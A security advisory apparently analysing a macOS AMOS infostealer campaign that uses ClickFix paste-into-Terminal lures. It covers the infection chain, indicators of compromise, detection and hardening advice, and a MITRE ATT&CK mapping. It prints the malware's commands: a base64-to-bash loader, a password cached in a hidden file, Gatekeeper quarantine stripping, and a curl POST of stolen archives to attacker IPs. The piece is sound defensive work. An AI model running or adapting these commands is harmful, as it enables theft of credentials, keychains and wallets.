Cyber Alert: AMOS Infostealer Dominates macOS Threats by Using Deceptive 'ClickFix' Lures to Bypass System Defenses

Modern enterprise security boundaries are increasingly defined by the endpoints navigating them, and macOS environments are no longer a safe haven from highly targeted malware. Recent incident response telemetry highlights an aggressive surge in macOS-focused info-stealing campaigns. Specifically, tactical investigations have uncovered an active variant of AMOS (Atomic macOS), a sophisticated Malware-as-a-Service (MaaS) family designed to systematically harvest high-value cryptographic and credential assets. AMOS has emerged as a dominant vector in the threat landscape, accounting for nearly 40% of all macOS protection updates throughout 2025 and driving roughly half of all reported macOS stealer incidents in early 2026. This technical analysis breaks down the multi-stage execution chain, anti-analysis countermeasures, and credential harvesting infrastructure leveraged by this variant.

The Social Engineering Vector and ClickFix Orchestration

Unlike traditional malware campaigns that rely heavily on sophisticated remote code execution (RCE) or zero-day exploit chains, this AMOS variant weaponizes human interaction through highly effective social engineering. The initial entry point utilizes a ClickFix-style architecture designed to exploit the user’s trust. Threat actors deploy deceptive web interfaces—frequently masquerading as fixes for web browsers or poisoned search results for cutting-edge AI utilities like ChatGPT or Grok—to prompt users to manually resolve an apparent error.

By tricking the user into executing an obfuscated command string directly inside the macOS native Terminal app, the attacker effectively bypasses standard web-browser sandboxing. This “paste-and-run” vector is not an isolated trend; it mirrors mechanics seen in the MacSync stealer family earlier this year, showing a broader industry shift where threat actors weaponize trusted native utilities ($bash$, $curl$) to bootstrap their initial access.

Multistage Attack Chain and Bootstrapping Mechanics

The execution lifecycle transitions seamlessly from initial terminal input to privileged system compromise through a structured sequence of defensive evasion and access escalation.

+-------------------------------------------------------------------+
| 1. User Executes Obfuscated Terminal Command (ClickFix Lure)      |
+-------------------------------------------------------------------+
                                 │
                                 ▼
+-------------------------------------------------------------------+
| 2. First-Stage Bootstrap Script Downloaded & Decoded via Bash     |
+-------------------------------------------------------------------+
                                 │
                                 ▼
+-------------------------------------------------------------------+
| 3. Local Password Validation via dscl Utility                    |
+-------------------------------------------------------------------+
                                 │
                                 ▼
+-------------------------------------------------------------------+
| 4. Secondary Payload Downloaded, Quarantines Removed via xattr   |
+-------------------------------------------------------------------+
                                 │
                                 ▼
+-------------------------------------------------------------------+
| 5. Anti-Analysis Check (QEMU/VMware/KVM via osascript)            |
+-------------------------------------------------------------------+
                                 │
                                 ▼
+-------------------------------------------------------------------+
| 6. Targeted Data Harvesting (Keychain, Browsers, Crypto Wallets) |
+-------------------------------------------------------------------+
                                 │
                                 ▼
+-------------------------------------------------------------------+
| 7. Local Compression via ditto & Exfiltration via HTTP POST      |
+-------------------------------------------------------------------+
                                 │
                                 ▼
+-------------------------------------------------------------------+
| 8. LaunchDaemon Configuration for Persistent Local Access         |
+-------------------------------------------------------------------+

The initial command presented to the victim leverages Base64 obfuscation to mask the underlying payload retrieval. Once pasted into the terminal, the vector executes a sequential pipeline:

echo <b64> | base64 -d | bash 
curl -fsSL hxxps://sphereou[.]com/cleanera

This first-stage bootstrap script immediately focuses on acquiring root-level execution parameters. Rather than exploiting local privilege escalation vulnerabilities, AMOS continuously prompts the victim for their account password through a native dialog loop until compliance is met.

To verify the integrity of the stolen credentials before proceeding, the malware handles validation locally against the Directory Services Command Line utility (dscl). If authorized, it caches the cleartext string in a hidden file to facilitate seamless sudo operations during later execution phases:

username=$(whoami)
dscl . -authonly "$username" "$password"
echo -n "$password" > "/Users/$username/.pass"

With privileged validation established, the bootstrap layer contacts its distribution node to deploy the primary binary asset (/tmp/update). To guarantee smooth execution on modern macOS endpoints, the malware strips standard operating system protective flags. Specifically, it executes xattr -c to wipe out the Extended Attribute quarantine markers normally imposed by Gatekeeper, entirely circumventing structural code-execution warnings before running the payload with administrative privileges:

curl -o /tmp/update hxxps://sphereou[.]com/cleaner3/update
echo "<PASSWORD>" | sudo -S xattr -c /tmp/update
chmod +x /tmp/update
/tmp/update

Defensive Evasion, Profiling, and Asset Exfiltration

Once the secondary binary executes under root permissions, it evaluates the execution environment to identify virtualization or automated sandboxes. The malware invokes osascript to parse configuration data gathered from the system_profiler subsystem. It explicitly checks for hardware indicators tied to virtualization platforms, including QEMU, VMware, and KVM. If these strings are detected, execution patterns alter or terminate to prevent analysis by automated security platforms.

If the host passes the sandbox checks, the binary starts local reconnaissance and staging. It runs discovery tools including whoami, id, hostname, and ioreg IOPlatformUUID to build a unique hardware identifier profile. Staging profiles are carved out under volatile tracking structures, such as /tmp/91897/ and /tmp/91897/FileGrabber/NotesMedia/.

In this variant, configuration flags like CONFIG_STEAL_FINDER, CONFIG_STEAL_NOTES_API, and CONFIG_STEAL_HISTORY dictate the harvesting behavior. The asset collection targeted by these parameters includes:

The native macOS Keychain database.
Firefox profile structures (including cookies, stored credentials, and form histories).
Chrome/Chromium database directories and extension storage paths containing session states.
Local application state data containing sensitive credentials or authentication tokens.

Notably, this variant embeds specialized collection logic containing fake Ledger Wallet and Trezor Suite application structures. These custom interfaces intercept user inputs to capture sensitive cryptocurrency credentials and backup seed phrases directly at the software layer.

Once gathered, the files are compressed using the native macOS ditto utility, preserving metadata attributes while packaging the stolen data. The archive is then exfiltrated via an outbound HTTP POST connection to remote attacker infrastructure:

ditto -c -k --sequesterRsrc /tmp/91897/ /tmp/out.zip
curl -X POST -F "file=@/tmp/out.zip" hxxp://38[.]244[.]158[.]56/contact

To ensure persistence across system reboots, the malware drops a hidden helper binary (.mainhelper) into the user’s home directory and registers a custom system configurations agent within the root-level LaunchDaemons repository:

Persistence Path: /Library/LaunchDaemons/com.finder.helper.plist

Finally, the host registers with the command-and-control (C2) servers via hxxp://45[.]94[.]47[.]204/api/join/ and begins checking hxxp://45[.]94[.]47[.]204/api/tasks/ for subsequent commands.

Defensive Engineering: Indicators and Prevention Metrics

Defenders can detect AMOS activities across host and network layers by monitoring for specific behavioral indicators and structural artifacts.

Key Detection Opportunities

Process Anomalies: Unprivileged or non-standard processes attempting to query browser profiles, Apple Notes, or Keychain databases.
Command Line Telemetry: Instances of dscl executing authentication checks followed closely by file writes to hidden home directory paths (e.g., ~/.pass).
Utility Abuse: Execution of the ditto utility packaging data out of /tmp/ staging paths, or anomalous curl operations transmitting files via HTTP POST to external IP addresses.
Persistence Identifiers: The creation of unauthorized plists within system daemons paths owned by root.

Host-Based Indicators (IoCs)

/Users/<username>/.pass
/tmp/update
/tmp/91897/
/tmp/out.zip
/Users/<username>/.agent
/Users/<username>/.mainhelper
/Library/LaunchDaemons/com.finder.helper.plist

Hardening and Prevention Strategies

Command Monitoring: Configure Endpoint Detection and Response (EDR) agents to detect and flag suspicious terminal input patterns, such as piping base64 decoders directly into a shell interpreter.
Policy Enforcement: Strictly enforce macOS Gatekeeper and notarization parameters; ensure MDM profiles block users from enabling the “Anywhere” application execution setting.
Privilege Management: Minimize local administrator accounts across enterprise endpoints, ensuring privileged elevation occurs only through monitored, verified internal workflows.
Binary Restricting: Block execution pathways running unsigned or unvetted software out of hidden user-space directories.
Configuration Monitoring: Audit creation or modifications within /Library/LaunchDaemons/ to quickly catch unauthorized persistence setups.

Our Opinion on this Case

The tactical shift highlighted by this AMOS infostealer variant underscores a critical turning point in endpoint security architecture. For years, enterprises treated macOS infrastructure as inherently resistant to malware, focusing defensive investments almost exclusively on Windows ecosystems. However, the commercial success of Malware-as-a-Service frameworks targeting macOS demonstrates that threat actors follow enterprise asset migration.

What makes this campaign notable is its reliance on psychological leverage rather than deep software flaws. By using ClickFix blueprints alongside lures tied to AI engines like ChatGPT and Grok, attackers capitalize on the rapid pace of technology adoption. They create a high-pressure scenario where a user willingly bypasses system security controls. This completely neutralizes platform protections like Gatekeeper and application notarization, turning native terminal utilities into the execution engine for the exploit.

From a defensive perspective, this case proves that technical isolation alone cannot safeguard an environment. Relying solely on signature-based identification for binaries is an outdated strategy, especially when attackers frequently change file hashes and modify code to bypass automated sandboxes. Organizations must adopt behavioral detection models that monitor for system abuses, such as unauthorized directory queries or the removal of file quarantine attributes. Ultimately, mitigating this style of attack requires balancing technical controls—like removing local administrative privileges—with security configurations that explicitly intercept and block unsafe user behaviors before execution can occur.

MITRE ATT&CK mapping

Attack Stage	Activity Description	MITRE ATT&CK Tactic	Technique ID	Technique Name
Initial Execution	User executes a malicious Terminal command that begins the infection chain	Execution	T1059.004	Command and Scripting Interpreter: Unix Shell
Stage 1 Loader	Bootstrap script runs and downloads/executes additional components	Execution	T1059	Command and Scripting Interpreter
Credential Prompt	Fake prompt captures the user’s system password	Credential Access	T1056	Input Capture
Stage 2 Payload	Secondary payload is executed to deploy the stealer functionality	Execution	T1059 / T1106	Command Execution / Native API
Environment Checks	Malware performs checks to gather system information and validate execution environment	Discovery	T1082	System Information Discovery
Credential Harvesting	Sensitive credentials are extracted from browsers and macOS Keychain	Credential Access	T1555	Credentials from Password Stores
Data Preparation	Stolen data is compressed or archived before transmission	Collection	T1560	Archive Collected Data
Data Exfiltration	Harvested data is transmitted to attacker-controlled infrastructure	Exfiltration	T1041	Exfiltration Over C2 Channel
Persistence Mechanism	Malware installs persistence mechanisms (e.g., Launch Agents) to survive reboots	Persistence	T1543.001	Create or Modify System Process: Launch Agent